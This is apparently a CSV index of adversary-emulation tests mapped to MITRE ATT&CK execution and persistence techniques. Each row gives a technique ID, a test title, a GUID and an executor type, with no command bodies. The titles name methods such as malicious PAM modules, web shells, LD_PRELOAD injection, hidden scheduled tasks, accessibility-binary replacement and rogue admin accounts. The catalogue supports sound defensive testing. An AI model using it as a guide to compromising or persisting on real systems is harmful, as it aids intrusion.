execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,bash
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
persistence,T1137.006,Office Application Startup: Add-ins,4,Persistent Code Execution Via Excel VBA Add-in File (XLAM),082141ed-b048-4c86-99c7-2b8da5b5bf48,powershell
persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM),f89e58f9-2b49-423b-ac95-1f3e7cfd8277,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Create Account: Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1098,Account Manipulation,10,Domain Password Policy Check: Short Password,fc5f9414-bd67-4f5f-a08e-e5381e29cbd1,powershell
persistence,T1098,Account Manipulation,11,Domain Password Policy Check: No Number in Password,68190529-069b-4ffc-a942-919704158065,powershell
persistence,T1098,Account Manipulation,12,Domain Password Policy Check: No Special Character in Password,7d984ef2-2db2-4cec-b090-e637e1698f61,powershell
persistence,T1098,Account Manipulation,13,Domain Password Policy Check: No Uppercase Character in Password,b299c120-44a7-4d68-b8e2-8ba5a28511ec,powershell
persistence,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
persistence,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
persistence,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,4,Snake Malware Kernel Driver Comadmin,e5cb5564-cc7b-4050-86e8-f2d9eec1941f,powershell
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
